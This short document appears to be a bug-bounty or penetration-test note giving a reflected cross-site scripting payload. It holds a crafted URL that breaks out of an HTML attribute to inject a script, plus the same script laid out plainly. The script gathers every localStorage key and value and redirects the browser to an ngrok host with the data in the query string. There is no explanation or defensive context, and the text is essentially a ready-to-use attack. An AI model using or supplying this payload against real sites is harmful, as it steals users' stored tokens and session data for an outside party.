PAYLOAD:

https://www.example.com?_=aaaa'><script>var dict = {};var keys = Object.keys(localStorage);var i = keys.length;while ( i-- ) {dict[Object.keys(localStorage)[i]]=localStorage.getItem(keys[i])};window.location = "http://2738-84-229-136-75.ngrok.io?payload" + JSON.stringify(dict)</script><span id='

Main JavaScript code:

var dict = {};
var keys = Object.keys(localStorage);
var i = keys.length;

while ( i-- ) 
{
	dict[Object.keys(localStorage)[i]] = localStorage.getItem(keys[i])
};
window.location = "http://2738-84-229-136-75.ngrok.io?payload" + JSON.stringify(dict)
